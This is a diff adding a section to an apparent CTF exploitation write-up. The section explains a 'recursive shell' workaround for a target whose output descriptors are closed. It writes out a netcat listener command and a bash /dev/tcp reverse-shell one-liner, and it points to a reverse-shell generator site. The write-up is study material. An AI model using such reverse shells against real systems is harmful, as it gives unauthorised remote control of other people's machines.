dungthtd9126/write-up-task-1/task4/README.md

 - At this stage, the program will call lock, which i replaced with one gadget
 - Ill check stack requirement at this stage to choose suitable one gadget then get shell
 ## Recursive shell
+- This is the final stage after getting shell.
+I need use this techinque because the program's fd 1 and fd 2 are closed
+- This mean even if i get shell, i cant get anything from the target as it will output nothing
+- To fix this, ill use recursive shell
+- The main idea of this technique is to execute new shell in my local host, which has fd 1,2,0 as sockets and all of it are bidirectional pipes.
+In other words ill use the target's shell to connect to my own server with new shell on
+- The new shell will just like the shell in a server, all it pipes are bidirectional, it uses sockets to output / input
+- The only different is i controled the server by default because it is my server
+- And most importantly, it has all pipes open
+### Create mini host
+- nc -lvnp 1337
+### Connect to mini host by target's shell
+- bash -c 'bash -i >& /dev/tcp/127.0.0.1/1337 0>&1'
+### Bonus
+- There are various reverse shell that is written in different language and for different OS
+- Note that i have to know the target's OS type to know what reverse shell to use.
+Because each OS may has different shell type and some reverse shell comand may not work with that shell
+- For example, if i use bash command to reverse shell, most times it works if the target is using linux.
+But if they use window, it will result in error and do nothing
+- There is a web that contains various reverse shell command for numerous languages and OS that i can use as blueprints for my own reverse shell command: https://www.revshells.com/